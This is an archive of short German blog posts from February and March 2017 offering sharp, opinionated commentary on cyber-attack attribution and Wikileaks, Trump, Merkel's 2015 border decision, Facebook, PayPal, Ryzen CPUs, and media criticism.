Erstens: Attribuierung von Cyber-Angriffen war schon immer Bullshit. Von Anfang an. Und ich habe es hier auch mehrfach angesagt und erklärt. Wenn Wikileaks jetzt den Anschein erweckt, die CIA oder das FBI habe sich als Russen tarnen können bei Cyberangriffen, dann ist das kein Bullshit sondern absolut richtig. Das war auch schon richtig, bevor sich Wikileaks eingemischt hat. Das hat nichts mit Verwirrungspropaganda zu tun. Im Gegenteil. Die Behauptung, man könne sowas zuordnen, DAS war Propaganda. Sascha, da hast du ins Klo gegriffen, da hättest du vorher mal jemanden fragen sollen, der sich mit sowas auskennt.
Ansonsten stimmt es natürlich, dass hier zwei Fronten gegeneinander kämpfen, die beide keine Sympathieträger sind. Ich sehe das nicht als Nachteil, im Gegenteil. Wenn sich zwei Böse streiten, kann es nur Gewinner geben. Wenn wir als Außenstehende außer Popcornkonsum noch etwas lenken wollen, sollte unser Ziel sein, den Kampf so lange wie möglich zu verlängern. Wenn die die Hände voll haben, können sie weniger böse Dinge gegen uns tun.
Im Übrigen finde ich den Vorwurf gegen Wikileaks mehr als grotesk, die würden ja nur West-Kram aufdecken. Wikileaks ist eine Leak-Plattform. Die leaken, was man ihnen reinreicht. Na klar hat Julian Assange persönlich was zu gewinnen, wenn er sich auf Trumps Seite schlägt, denn Trump kann ihn schlicht begnadigen, dann wäre seine Botschaftsodyssee vorbei. Ich bin etwas irritiert, dass Trump das noch nicht getan hat. Der hat doch sonst keine Zurückhaltung gezeigt, wenn es um die Belohnung von Leuten ging, die ihm geholfen haben.
Aber mal ganz konkret. Glaubt ihr ernsthaft, wenn jemand Wikileaks "Vault 8" aus den russischen Geheimdiensten zukommen lässt, dass die das dann nicht auch raushauen würden? Wenn DAS jemand nachweisen kann, dass sie das dann geheim halten würden, dann können wir reden. Bis dahin ist das kein gültiger Kritikpunkt an Wikileaks. Rein statistisch finde ich völlig klar, dass die USA mit ihren 17 (!) Geheimdiensten da prominent vertreten sein werden. Wer so viel Geld für Geheimdienste ausgibt, bei dem fällt halt auch echt viel leakbares Material an. Ich glaube übrigens auch nicht, dass die Russen da grundsärtzlich perfekte Opsec fahren. Aber da müsste man wahrscheinlich auch logistisch mehr bewegen, für so einen Leak, alles nach Englisch übersetzen und so.
Kurzum: Trump und die CIA kloppen sich? Prima! Wikileaks hat sicher nicht alles richtig gemacht, und besonders Julian und sein Twitter-Account ist kein Ruhmesblatt. Aber dass eine Leak-Organisation Daten leakt, kann man ihr nicht vorwerfen, und wenn sie dann Propaganda publiziert, die inhaltlich und stilistisch ein Abziehbild der staatlichen Propaganda gegen sie selbst ist, das finde ich auch in Ordnung. Das geht als Medienkompetenz durch. Mir persönlich wäre es lieber, wenn sie da neutral blieben, das würde ihre Leaks kraftvoller machen. Aber hey, die übernehmen das Risiko, die definieren die Spielregeln. Ich kann hier viel reden, solange der Tag lang ist. Wenn mir jemand CIA-Daten geben würde, würde ich die bestimmt nicht in mein Blog tun. Ich würde gerne noch ein paar Jahre länger leben.
Update: Was ich ja richtig geil fände: Wenn die Russen ihre Exploits alle aus den selben Quellen kaufen wie die NSA, oder noch besser: Ihre Tools von der NSA geklaut haben. Und der Equation Group Leak tatsächlich gar kein NSA-Hack war sondern ein Russen-Hack :-)
Das ist das Problem mit Cyber-Attribuierung. Das weiß man alles nicht.
Update: Nur dass das hier keiner missversteht. Sascha ist einer von den Guten, und er hat auch mit dem überwiegenden Teil seiner Kolume recht, und wir sind auch immer noch Freunde. Und nur weil Cyber-Attribuierung Bullshit ist, heißt das nicht, dass Wikileaks nicht Teil einer Kampagne von Trump gegen die CIA ist. Weitere Ausführungen dazu.

Wed Mar 8 2017

[l] Die BBC hat mal gezielt bei Facebook ein paar sexuell anzügliche Kinderbilder gemeldet. Um mal zu gucken. Kein Problem, denkt ihr euch jetzt. Da wird Facebook dann halt die Bilder wegmachen und fertig. Es lief aber ein bisschen anders.
Akt 1: BBC meldet kinderpornographische Bilder bei Facebook und bittet um ein Interview.
Akt 2: Facebook hätte gerne Samples zugeschickt (!?). Die BBC schickt ihnen die Bilder, die sie gemeldet hatten, die aber nicht weggemacht wurden.
Akt 3: Facebook zeigt BBC bei der Polizei an, weil sie ihnen Kinderpornographie geschickt haben, und sagt das Interview ab.
Hey, bei so einer Firma willst du doch einen Account unterhalten!1!!

Sun Mar 5 2017

[l] Merkel wollte 2015 die Grenzen eigentlich zumachen, der Befehl an die Bundespolizei war schon geschrieben. Und natürlich war das kein Merkel-Alleingang, sondern die Rechtspopulisten von der CSU haben die Sau durchs Dorf getrieben und die Verräterpartei ist umgefallen.
Anders als bisher bekannt, verständigten sich führende Politiker von CDU/CSU und SPD im September 2015, Flüchtlinge an der deutsch-österreichischen Grenze zurückzuweisen.
Wie immer also.
Und nicht nur lag das alles in der Schublade, die Planung war sogar schon angelaufen:
Auch der Einsatzbefehl, den die Führung der Bundespolizei schrieb, wies in seiner ursprünglichen Fassung die Polizeidirektionen ausdrücklich an, Migranten ohne notwendige Papiere „auch im Falle eines Asylgesuches“ zurückzuweisen. Dafür wurden in der Nacht zum Sonntag Polizeibeamte aus ganz Deutschland an die Grenze beordert. Um sie zu transportieren, wurden Busse und sogar Hubschrauber eingesetzt.
Aber dann gab es plötzlich eine Rolle rückwärts. Und hier ist, woran es gescheitert ist: Merkel wollte die Entscheidung nicht treffen. Das war noch nicht alternativlos genug. Sie wollte Zusagen haben, dass es keine "schwer vermittelbaren Bilder" vom Bundeswehreinsatz gegen Flüchtlinge geben würde, und sie wollte Zusagen, dass die Grenzschließung vor Gericht bestande haben würde. Das hätte sie natürlich nicht gehabt, denn es sollten ausdrücklich auch Asylsuchende abgewiesen werden. Der Hammer ist, dass De Maiziere das nicht sofort so gesagt hat, sondern erst mal Rücksprache halten musste.
Das Ass Covering der Politik hat die Flüchtlinge gerettet. Das war keineswegs unsere gefestige Moral oder dass wir gute Menschen sind. Nein. Merkel wollte Zusagen, dass sie nicht in Haftung genommen wird für ihren geplanten Verfassungsbruch. Die konnte ihr keiner geben. Also hat sie es nicht gemacht. Merkels Wille zur Macht war der entscheidende Faktor.

Sat Mar 4 2017

[l] Paypal hat mal wieder eine Klage am Bein, und die Vorwürfe sind mal wieder echt ekelhaft. Und zwar betreibt Paypal eine Plattform, über die man Geld spenden kann. Sie haben da eine Liste von potentiellen bedürftigen Spendenempfängern, da kann man sich welche aussuchen, und dann kann man Geld spenden.
Das hat jemand getan, und danach mal bei den ausgewählten Empfänger angerufen, was die mit dem Geld gemacht haben. Die wussten von keinem Geld.
The lawsuit, filed in the Federal District Court of Northern Illinois, claims that hundreds of thousands of charities have never received donations earmarked for them.
[l] Es gibt übrigens inzwischen eine plausible Theorie dafür, wieso Ryzen bei Single-Threading zurück fällt. Und zwar haben die jetzt vorgestellten Ryzen-Prozessoren 8 Kerne, aber nicht 8 symmetrische Kerne an einem Bus, sondern zwei "CPU Complex" (CCX) mit je vier Kernen. Die Kerne sind zwar immer noch gleich stark, egal in welchem CCX die sind, aber Kommunikation zwischen den CCX ist halt deutlich langsamer als innerhalb eines CCX.
Damit ist der Ryzen sozusagen NUMA-on-a-chip.
Wenn man einen Multicore unter Windows betreibt, aber nur auf einem Core richtig Last fährt, dann schiebt Windows die Last immer im Kreis zwischen den Cores. Die Idee dabei ist, dass nicht ein Kern die ganze Last abkriegt und dann zu heiß wird. So kann man Materialermüdung vorbeugen und der Kühler muss möglicherweise weniger schnell drehen und schrill pfeifen. Ist an sich eine gute Idee, aber wenn Windows jetzt von einem Kern in der 1. Gruppe auf einen Kern in der 2. Gruppe schaltet, dann kostet das eben Performance.
An sich kann das Betriebssystem das auch wissen, wenn es NUMA-aware ist, aber da hinkt Windows schon länger deutlich hinterher. Womöglich hat AMD hier auch irgendwas subtil anders gemacht, dass die NUMA-Erkennung nicht anschlägt. Wer weiß. Das wäre jedenfalls eine Erklärung.
Und das heißt auch, wenn Microsoft ein Update shippt, und das werden sie zeitnah, dass dann das Problem weggeht. Man könnte das mal ausprobieren, wenn man einen Ryzen hat, indem man eine Single-Core-Anwendung per Prozessoraffinität auf einen Core festnagelt.

Wed Mar 1 2017

[l] Man kann das gar nicht zu hoch bewerten, dass Donald Trump zu seinen alten peinlichen Tweets steht. Das ist ein Luxus, der nicht selbstverständlich und nicht alltäglich ist. Ich habe hier ja auch noch nie einen Beitrag gelöscht. Man muss zu seinem Scheiß stehen, gerade wenn man Scheiße erzählt hat. Fehler sind menschlich. Wer seine Fehler leugnet, verspielt seine Glaubwürdigkeit.
Als Gegenbeispiel will ich mal Brianna Wu zitieren, die in diesem denkwürdigen Tweet erklärt hat, wieso SpaceX die Menschheit gefährdet. Falls der Google-Cache expired: Hier hat jemand einen Screenshot gemacht.
Brianna Wu ist eine der Protagonistinnen auf SJW-Seite bei Gamergate, und sie versucht gerade, für die Democrats Congress-Abgeordnete zu werden.
Falls jemand in Physik nicht aufgepasst hat: Wenn man auf dem Mond einen Stein fallen lässt, dann fällt der auf den Mond, nicht auf die Erde.
Und wie üblich auf Twitter: Wer sie darauf anspricht, ist ein "Nazi frog".
Update: Übrigens ist das natürlich in der Science Fiction "schon immer" ein Szenario, ob man nicht Asteroiden auf einen Planeten abstürzen lassen kann als Waffe, oder sogar ob man vom Mond aus die Erde beschießen kann. Energetisch wäre das vergleichsweise günstig, weil man viel weniger Energie braucht, um die Anziehungskraft des Mondes zu überwinden, als man beispielsweise für das Überwinden der Anziehungskraft der Erde bräuchte. Aber so richtig überzeugend ist die Idee trotzdem nicht, denn a) ist das kein Fallenlassen sondern ein Hochschießen, b) ist das Zielen nicht ganz einfach (und nicht alle Ziele auf der Erde wären treffbar), c) hätte die Erde mehrere Tage Zeit, das Zielgebiet zu evakuieren. Aber hey, Scifi halt. :-)

Sat Feb 25 2017

[l] Die erste Einsendung zur Expertenfrage:
zu Deiner Frage, ob das Zeigen von Experten eine Strategie ist, um den Leuten das Gefühl zu geben, dass es da draußen Leute gibt, die sich auskennen, und der Zuschauer sich da nicht mehr näher für interessieren muss:
Als Fernsehmacher sage ich dazu ganz klar: Nein.
Ob sich meine Zuschauer näher für ein Thema interessieren, nachdem ich ihnen einen Experten dazu gezeigt habe, ist deren Entscheidung. Ich habe da keine Präferenz. Wieso auch sollte ich denen das vorschreiben wollen?
Ich glaube vielmehr, die Zuschauer interessieren sich hinterher stärker für ein Thema, wenn sie das Gefühl haben, dass es sie unmittelbar betrifft.
Und die Auftritte von Experten in den Medien sind für mich auch kein Symptom dafür, dass man als Journalist sein Publikum für dumm hält.
Was glaubst Du denn, warum zum Beispiel die FAZ gerade Dich über Trojaner-Angriffe auf die Bundesregierung befragt? Doch bestimmt nicht, weil sie ihre Leser für dumm hält oder sie sich nach der Lektüre des Artikel nicht mehr näher für das Thema IT-Sicherheit interessieren sollen?
Oder habe ich da irgend etwas an der Argumentation in dem Posting falsch verstanden?
Ich sollte das vielleicht noch mal genauer ausführen, was ich gemeint habe. Ich meinte nicht, dass ein einzelner Fernsehmacher oder Talkshowproduzent sich denkt, hey, heute halte ich mal die Massen dumm und lade ein paar Experten ein. Mir ging es eher darum, ob wir es uns in einem System bequem gemacht haben, in dem die Bevölkerung glaubt, das Wahlvolk ist eh zu doof für eine echte Demokratie, und das wäre bloß gefährlich, wenn man die ernsthaft entscheiden ließe. Wenn man diese Prämisse akzeptiert, dann wäre das ständige Vorzeigen von Experten ein mögliches Verfahren, um diese Idee zu bestärken. Ob jetzt mit Absicht oder nicht.
Ich denke, dass ich eigentlich auf den Widerspruch zwischen "ich habe einen Verstand, und wenn ich auf ein Problem stoße, dann benutze meinen Verstand, um mir selbst zu helfen" und "lass mal die Experten sich kümmern, ich hab ja eh keine Ahnung" hinaus wollte.
Experten sind jetzt nichts Schlechtes. Wir können ihnen gerne das Sammeln und Bewerten der Argumente überlassen. Aber wir sollten Experten nicht dafür nutzen, uns das Denken oder die Entscheidung abzunehmen.
[l] Mir ging gerade noch eine Sache durch den Kopf.
Seit Trump wirken ja die ganzen anderen Pappnasen plötzlich wie seriöse Staatsmänner. Dieses Muster gibt es auch in Kriminalfilmen. Good Cop, Bad Cop.
Was wenn die Eliten einen Deal gemacht haben. Hört mal, unsere Umfragewerte sind alle im Keller, die Wirtschaft ist im Arsch, niemand genießt mehr das Vertrauen seiner Bevölkerung. Wir brauchen mal einen Bad Cop, der den Leuten zeigt, wie gut sie es haben. Lasst uns ein Land nehmen, das wirtschaftlich eh schon völlig im Arsch ist.
So, wen könnten wir nehmen? Schauspieler? Nee, nicht unseriös genug. Schaut nur, wie weit Reagan gekommen ist.
Wie wäre es mit einem Reality-TV-"Star"? Großartig! Da muss man ein bisschen gucken, weil die meisten noch nicht alt genug sind. Oh hier hätten wir einen!1!! :-)

Fri Feb 24 2017

[l] Krasse Geschichte aus dem Miniatur-Wunderland in Hamburg. Die hatten da eine Aktion gemacht, die auch Leute reingelassen hat, die sich den Eintritt nicht leisten konnten. Unter anderem haben das natürlich auch Flüchtlinge wahrgenommen dann. Und da kam dann ein Hassbrief rein, der sie beschimpft hat für die Aktion.
Und hier wird es schwierig für Leute, die nah am Wasser gebaut sind. Die Interviewer wollen wissen, ob die Aktion denn ein Erfolg war. Antwort:
Frederik Braun: Auf jeden Fall. Wir haben rund 18.000 Menschen hineingelassen.
Na da werden sich doch bestimmt lauter Leute reingeschmuggelt haben, die sich doch den Eintritt hätten leisten können!1!!
Wir hatten letztes Jahr im Januar genauso viel zahlende Gäste wie dieses Jahr. Das gibt mir das Gefühl, dass alle ehrlich waren. Und: Wir verzeichnen Pro-Kopf-Umsätze. Das heißt, wir wissen, wie viel jeder Kunde im Durchschnitt im Bistro ausgegeben und Merchandising gekauft hat. Und rechnet man diese 18.000 raus,
Gerrit Braun: kommt man auf ein ganz trauriges Ergebnis.
Frederik Braun: Es ist nämlich die gleiche Zahl wie sonst. Was heißt, obwohl diese 18.000 Menschen keinen Eintritt zahlen mussten, hatten die meisten nicht mal das Geld, ihren Kindern eine Cola zu kaufen.
Ja wie jetzt, sind die gar nicht verarscht worden?
Im Gegenteil, wir haben Märchen da unten erlebt. Weinende Kinder, weinende Eltern. Ein Sohn hatte sich zu Weihnachten als einziges gewünscht, ins Miniatur-Wunderland zu gehen - und die Eltern konnten es sich nicht leisten, ihm diesen Wunsch zu erfüllen. Und jetzt standen sie da und beide Eltern haben geheult. Mir stiegen auch die Tränen in die Augen.
Eine schöne Weihnachtsgeschichte!
Oh und wer noch nicht im Miniatur-Wunderland war: Geht da mal hin! Ist super!

Thu Feb 23 2017

[l] Investigative Journalisten haben jetzt herausgefunden, dass EU-Forschungskohle für IT-Sicherheit bei Fraunhofer und co verdampft. Money Quote:
Demnach hätten es die Industrie und Forschungsinstitute wie die Fraunhofer-Gesellschaft geschickt verstanden, sich millionenschwere Forschungsprojekte zu sichern. Wirklich einsetzbare Produkte kämen dabei aber selten heraus, obwohl mehrere Milliarden Euro investiert wurden.
Ich habe ja noch nie aktiv an sowas teilgenommen, ich habe das nur aus der Ferne beobachtet. Das hat mir gereicht. Die eine Hälfte solcher Projekte besteht üblicherweise aus irgendwelchen gammeligen Forschungsabteilungen von irgendwelchen Unis auf der verzweifelten Suche nach Drittmitteln. Die andere Hälfte besteht aus irgendwelchen konkurrenzunfähigen Klitschen, die auf dem Markt ohne EU-Förderprojekte nicht bestehen können, und die so versuchen, auf Kosten von ein paar Uni-Deppen Patente auf offensichtlichen Bullshit anmelden zu können, und das noch vom Steuerzahler finanziert zu kriegen.
Aber hey, ich bin mir sicher, dass ich da eine voll unrepräsentative Auswahl zu Gesicht bekam!1!!
Für den Vorwurf, dass da keine verkaufbaren Produkte rauskommen: Das ist die Idee. Daher heißt das Forschung und nicht Produktentwicklung. Schade wäre allerdings, wenn mal jemand gucken würde, ob da ordentliche Forschung gemacht würde, und dann rauskäme, dass sich da bloß ein paar "Technikphilosophen" ihren aufwendigen Lebenswandel mit finanziert haben. Das wäre echt tragisch. Gut, dass keiner guckt.
[l] Wie Trumps Mitarbeiter versuchen, seine Twitter-Ausbrüche zu kontrollieren. Die Strategie ist, genug "der Trump ist ja so toll!1!!"-"Presse" in seinen Medienkonsum zu schmuggeln. Wenn die Presse gerade nirgendwo schrieb, wie toll Trump ist, dann haben sie halt bei Breitbart angerufen und die haben schnell eine "Trump ist ja so toll!!1!"-Story publiziert.
Mit anderen Worten: Die Medien werden nicht mehr manipuliert, um die Bevölkerung zu manipulieren. Sie werden manipuliert, um den Präsidenten zu manipulieren.
Wenn sie die Stories platziert gekriegt haben, dann haben sie sie auch schnell jemanden tweeten lassen, den Trump in der Timeline hat. Genau wie man sich sowas vorstellen würde.
"He saw there was activity, so he didn't feel like he had to respond," the former campaign official said. "He sends out these tweets when he feels like people aren't responding enough for him."
Der Lacher ist ja: Ich habe vor vielen Jahren mit Holgi auf Radio Fritz ein paar Sendungen gemacht. Wir haben die Sendungen unter dem Titel "Alternatives Realitätsmanagement" gefahren. Und das ist ja wohl die ideale Beschreibung dafür, was die da gerade mit Trump machen! Voll der Black Mirror-Scheiß! Vielleicht noch vor dem Fenster einen Bildschirm montieren und auf dem Fans einspielen oder so. Wie krass. Das ist Realitätsmanagement für den Präsidenten.
The in-person touch is also important to keeping Trump from running too hot. One Trump associate said it’s important to show Trump deference and offer him praise and respect, as that will lead him to more often listen. And if Trump becomes obsessed with a grudge, aides need to try and change the subject, friends say. Leaving him alone for several hours can prove damaging, because he consumes too much television and gripes to people outside the White House.
Das ist wie wenn man so einen Demenzpatienten jongliert. "Wenn wir uns zu lange am Stück nicht kümmern, ruft er Leute an und erzählt ihnen komische Dinge!"
Ein Problem ist auch, dass Trump als New Yorker die New York Times liest. Und die ist halt nicht sonderlich Trump-freundlich. Und lässt sich wohl auch keine beruhigenden Realitätsmanagement-Stories von Trumps Pflegepersonal reindrücken. Vielleicht sollten die das mal machen? Eine Sonderausgabe der New York Times für Trump, voll mit "boah ist der Trump toll, der macht alles richtig!1!!"-Stories.
So weit sind wir schon.

Wed Feb 22 2017

[l] Es gibt bei manchen CPUs eine mythische "NSA-Instruktion" namens Population Count. Es geht darum, die Bits in einem Bitstring zu zählen. Die Genesis-Story dahinter ist, dass man das beim DES-Cracking braucht, und daher die NSA bei Cray damals Druck gemacht haben soll, um eine Instruktion dafür zu kriegen. Moderne Intel-CPUs haben auch eine Instruktion dafür.
Ich habe vorhin diese Webseite gefunden, die ein Stück Code hat, das Popcount von Hand macht, und damit schneller ist als die dedizierte Instruktion.
Das ist erstaunlicherweise nicht das erste Mal, dass CPU-Bauern sowas passiert. Aber gerade bei Popcount wundert es mich, weil da die Begründung für die dedizierte Instruktion Performance war.
Schon merkwürdig, dass sowas immer wieder mal vorkommt.
Ein anderes bekanntes Beispiel ist die Loop-Instruktion bei x86, die aus historischen Gründen langsamer ist als wenn man von Hand ein Register runterzählt und einen Conditional Jump macht. AMD hat die Instruktion zu K5-Zeiten mal ordentlich implementiert, und plötzlich platzten auf ihren CPUs alle möglichen Turbo-Pascal-Programme, weil deren Runtime eine Schleife mit der Loop-Instruktion benutzt hat, um ihre Millisekunden-Warten-Funktion zu kalibrieren. Und das ergab dann eine Division durch Null oder sowas, weil AMD zu schnell war.
Es gibt bei modernen CPUs immer wieder solche lustigen Geschichten an irgendwelchen staubigen Ecken :-)
Update: Ich sollte dazu sagen, dass das nicht nur für die NSA wichtig ist. Popcount kann man auch beim Videocoding brauchen, für die Hammingdistanz (relevant für Kodierungsverfahren), und sogar für Biometrie und Computerschach. Der Hauptgrund, wieso die neuen Verfahren flotter sind, ist weil die auf breiteren Vektoren arbeiten können.
[l] Wieso gibt es eigentlich noch kein Trump-Elcor-Mem?
Die Elcor sind bei Mass Effect (eine Videospielreihe) ein Running Gag. Eine Alienart, deren Übersetzer keine Emotionen ausdrücken können. Also sagen die Elcor immer am Anfang des Satzes ihre Emotion dazu. Sowas wie "Sad. We are sorry for your loss." Mass Effect hat daraus dann den Running Gag gemacht, dass es eine Hamlet-Vorführung mit Elcor gibt. Hier ist ein Video.
Und Trump macht ja bei seinen Tweets auch immer sowas, nur packt der das "Sad." ans Ende statt an den Anfang.
Elcor sehen im Spiel wie gestrandete Seekühe aus.

Mon Feb 20 2017

[l] Hattet ihr eigentlich diese Trump-"Umfrage" zu den Mainstream-Medien gesehen?
Wenn ihr nur oben kurz geguckt und dann das Tab zugemacht habt, dann nehmt euch dieses Mal bitte die Zeit und guckt euch alle Fragen an. Ich finde sogar, das sollte in Schulen unterrichtet werden. Medienkompetenz zum Anfassen.
[l] Benutzt hier jemand Apple-Geräte?
Gut gemacht! Schön weiter nach vorne beugen, Apple ist noch nicht fertig.

Sat Feb 18 2017

[l] Trumps Wirtschaftspolitik nimmt Formen an.
Normalerweise gibt es Wachstums-Vorhersagen, und an denen entlang entwirft man dan sein Budget.
Trump hingegen hat ein Budget gemacht, das Steuersenkungen und Mehrausgaben vorsieht, hat dann ausgerechnet, wieviel illusorisches Wachstum man dafür bräuchte, und hat dann den Vorhersagern schlicht befohlen, soviel Wachstum vorherzusagen.

Thu Feb 16 2017

[l] Videotipp: Jon Ronson spricht bei der Oxford Union. Das Video ist schon ein Jahr alt, und ich habe auch schon auf Jon Ronson verlinkt. Das ist ein Journalist aus Großbritannien, den ich sehr bewundere. Er hat unter anderem mal einen TED-Talk über Psychopathie gemacht, der auch sehr empfehlenswert ist, und der mit den ersten Minuten von dem Video oben ein bisschen überlappt.
In dem TED-Talk geht es u.a. um einen Typen, der mit 17 jemanden (tot?)geschlagen hat, und der drohenden Gefängnisstrafe entgehen wollte (5 Jahre) entgehen wollte, indem er eine Geisteskrankheit simulierte. Die Punchline ist, dass er in eine Irrenanstalt kommt, aber dort 12 Jahre lang festgehalten wird, weil man ihm nicht glaubt, dass er nicht geisteskrank ist. Andere Journalisten hätten an der Stelle aufgehört, aber Jon Ronson fängt dann an, zu reflektieren, und das ist der wirklich spannende Teil.
In dem oberen Video geht es am Rande um die Geschichte aber viel mehr um Public Shaming auf Twitter, und das ganze Umfeld. Jon Ronson hat auch ein Buch darüber geschrieben, es ging dabei um die Geschichte mit der PR-Frau auf dem Flug nach Südafrika, die einen schlechten Witz tweetete und dann noch während sie in der Luft war dafür gefeuert wurde, ihr erinnert euch vielleicht.
Ausgesprochen interessante Gedankengänge, und wer mal ein-zwei Stunden Zeit hat, dem kann ich das nur empfehlen. Die Hälfte von dem oberen Video sind Zuschauerfragen, und die sind (wie eigentlich immer bei der Oxford Union) auch sehr empfehlenswert.
Viel Spaß!

Wed Feb 15 2017

[l] Zu Behörden-IT kam hier noch eine Mail von einem Rechtsanwalt rein:
Was Du da über München schreibst, sieht woanders nicht besser aus.
Das Ordnungsamt Friedrichshain-Kreuzberg hat nicht mal optische Laufwerke. Ich wollte da neulich wegen Durchsuchungen (also genauer: gaststättenrechtliche Nachschau) in der Rigaer Str. auch die Filmaufnahmen haben, die eine Einsatzhundertschaft gemacht hat. Dialog am Telefon ging so:
RA: Haben Sie auch den Film bei der Akte?
OA: Was für einen Film?
RA: Na da hat die Polizei alles gefilmt. Lesen Sie keine Zeitung?
OA: Also wir haben hier keinen Film bekommen. [Überlegt] Also wir haben hier eine CD, da habe ich mich auch schon gefragt was da drauf ist!
RA: Haben Sie nicht nachgeschaut?
OA: Nein, wir haben dazu kein Laufwerk!
o_O

Fri Feb 10 2017

[l] Wenn ich irgendwo anders als zuhause bin, lese ich auch gerne den Lokalteil in den Zeitungen. Das ist auf der einen Seite eine gute Methode, um mal ein bisschen ein Gefühl dafür zu kriegen, wie die Leute hier so ticken, was denen wichtig ist, was für Werte die so hochhalten. Auf der anderen Seite hat man da als Außenstehender auch einen ganz anderen Zugang zu als wenn das der Lokalteil der Zeitung bei einem zuhause ist.
In Utah, wo ich gerade bin, ist zum Beispiel ein heißes Thema, wie man mit Obdachlosen umgehen soll. Salt Lake City ist Mormonen-Hauptquartier, Utah ist überhaupt sehr stark von den Mormonen und ihren Werten beeinflusst, und hat mir zum ersten Mal bei einer Religion das Gefühl gegeben, dass das auch mal gute Auswüchse haben kann, von einer Religion beeinflusst zu sein. Und so ist man hier auch stark überdurchschnittlich daran interessiert, Obdachlosen zu helfen und sie wieder in die Gesellschaft zu integrieren. Der Effekt, den man auf der Straße sieht, ist aber genau gegenteilig. Dadurch, dass die hier nicht so Scheiße behandelt werden wie anderswo in den USA, gibt es hier vergleichsweise viele davon (die kommen dann halt von weiter weg her, und sterben hier auch nicht so schnell weg wie anderswo).
Aber hey, eigentlich ging es mir um was völlig anderes. Utah ist ein sehr konservartiver Bundesstaat der USA, wenn nicht gar der konservativste. Einer der Abgeordneten im Bundes-Congress aus Utah ist Jason Chaffetz, der dann natürlich in Washington die Parteilinie vertritt, wie alle Polit-Arschkriecher halt. Und das heißt im Moment: Trump-Fanboytum. U.a. hat Chaffetz sich für Trump aus dem Fenster gelehnt, als der Ethikausschuss letzten Monat Bedenken anmeldete bezüglich Trumps Gebaren. Aber wie alle Abgeordneten muss der gelegentlich an der Heimatfront seinen Wählern Rede und Antwort stehen, und das war gestern der Fall. Da spielten sich dann bemerkenswerte Szenen ab. Wie gesagt: Utah ist einer der konservativsten Bundesstaaten der USA.
“So, President Trump,” Chaffetz began, a minute or two into the meeting, before being immediately drowned out by loud boos.
“If you want me to answer the question, please give me more than five seconds to answer it, OK?” Chaffetz asked a few minutes later after several people heckled him, claiming he hadn’t adequately answered an audience member’s question about investigating Trump.
Das ist ja schon mal echt krass. Aber mein persönliches Highlight aus der Story ist das hier:
“Do you believe in science?” asked Hannah Bradshaw. “Because I do.”
Das genau Alter habe ich nicht, aber sie wird in den Medien als "soft-spoken young girl" beschrieben. Das muss einen ja schon mitnehmen, wenn sowas passiert, oder?
Die ganze Veranstaltung lief aber nicht so gut für den Chaffetz. Eine Lehrerin wollte wissen, wo er die rote Linie zieht.
“It’s been two or three weeks,” she said. “We have a problem child.”
Another teacher — Chelsie Acosta, from the Salt Lake area — demanded of Chaffetz that he explain to her how she can "tell (students) about where our country got to today.”
One man asked Chaffetz to investigate Trump’s business interests, calling the president “despicable.” His comment received a standing ovation and chants of “Do your job!”
Dazu kommt, dass Chaffetz ursprünglich angesagt hatte, nicht für Trump zu stimmen, es aber dann doch gemacht hat.
Update: Es gibt ein Video von dem kleinen Mädchen, und da sagen sie, sie ist 10.

Thu Feb 9 2017

[l] Acht Jahre Gefängnis für NPD-Politiker wegen Brandanschlag auf geplante Flüchtlingsunterkunft.
Der Verurteilte sitzt als Abgeordneter in der Stadtverordnetenversammlung und dem Kreistag Havelland und war sogar Kandidat für den Einzug in den Bundestag.
Dass dieser Anschlag gemacht wurde, bevor Flüchtlinge in dem Heim waren, heißt für mich, dass die sich das genau überlegt haben. Mörder wollten sie nicht sein, nur Sachbeschädiger. Das heißt aber auch, dass die da ein moralisches Gerüst konstruiert haben, innerhalb dessens so ein Anschlag der guten Sache dient. Aber nur, solange da noch keine Flüchtlinge drin sind. Ich bin mir jetzt gerade nicht sicher, was meine Erwartungen waren. Aber wenn das völlig unberechenbare wilde Tiere wären, dann hätten sie auch Mord in Kauf genommen, oder? Ist das jetzt gut oder schlecht?
Auf jeden Fall heißt es aber, dass die NPD keine Qualitätssicherung hat bei ihren Abgeordneten-Kandidaten macht. Das sind nicht "die weniger Schlimmen". Oder vielleicht gibt es bei der NPD auch gar keine weniger Schlimmen.
Update: Oder die NPD stellt absichtlich so Leute auf, um Nazi-Gewalt zu normalisieren und den Tätern Schutz zu bieten.
[l] Und während wir uns hier alle schön über Trump aufregen, zeigt eine Umfrage in Europa, dass die Leute auch hier auf das Modell Trump stehen. Chatham House hat Leute in 10 EU-Ländern gefragt, ob sie auch einen Moslem-Einwanderverbot ala Trump gutheißen würden. Ergebnis:
Majorities in all but two of the ten states agreed, ranging from 71% in Poland, 65% in Austria, 53% in Germany and 51% in Italy to 47% in the United Kingdom and 41% in Spain. In no country did the percentage that disagreed surpass 32%.
Spanien und UK sind die einzigen Länder, in denen weniger als 50% für ein Einwanderungsverbot aus mehrheitlich muslimischen Staaten waren.
Die Umfrage wurde gemacht, bevor Trump sein Moslem-Verbot angekündigt hatte.
Die passende Illustration für dieses Ergebnis ist glaube ich diese Karikatur hier.
[l] Wie geil: Der Iran hat ein Video "America First, Iran Second" gemacht. Der Iran!! MWAHAHAHAHAHA (Danke, Peter)

Tue Feb 7 2017

[l] Ein Leser hat mir seinen Briefwechsel mit einem Reporter aus dem Verlagshause Madsack (ursprünglich Region Niedersachsen) geschickt, den ich hier mal ins Blog nehmen möchte:

> Von: [Leser]
> An: [Reporter]
> Betreff: Re: Das leise Sterben der Wahrheit
>
> Sehr geehrter [Reporter],
>
> Sie hatten mich auf die Website https://euvsdisinfo.eu aufmerksam
> gemacht, aus der Sie auch zitiert hatten. Dort lese ich
> nun heute:
>
> "The Bulgarian outlet “BG news 168” gave us this curious news that the
> EU Court (we’re not sure which court they refer to) has ruled that after
> March 2017, Europeans are no longer allowed to baptise their new-borns."
> https://euvsdisinfo.eu/eu-bans-baptising-children/
>
> Unten steht im Impressum
> "the EU’s East StratCom Task Force… was set up after EU Heads of State
> and Government stressed the need to challenge Russia’s ongoing
> disinformation campaigns"
>
> Die Republik Bulgarien gehört doch aber nicht zur Russischen Föderation
> sondern ist ein EU-Mitglied?
>
> Oder ist 'The Bulgarian outlet “BG news 168”' eine verschleierte
> russische Quelle? Ein Impressum finde ich dort nicht.
>
> Alles sehr verwirrend.
>
> Ich sende Ihnen das nicht, weil ich meine, daß Sie das irgendwie
> kommentieren müßten. Die Site euvsdisinfo.eu scheint mir aber nicht so
> komplett bedenkenlos zitierfähig. Als Ihr Leser wäre mir lieb,
> Sie geben dieser Quelle kein zu großes Gewicht bei Ihrer
> Nachrichtenbeschaffung.
>
> Freundliche Grüße
>
> [Leser]
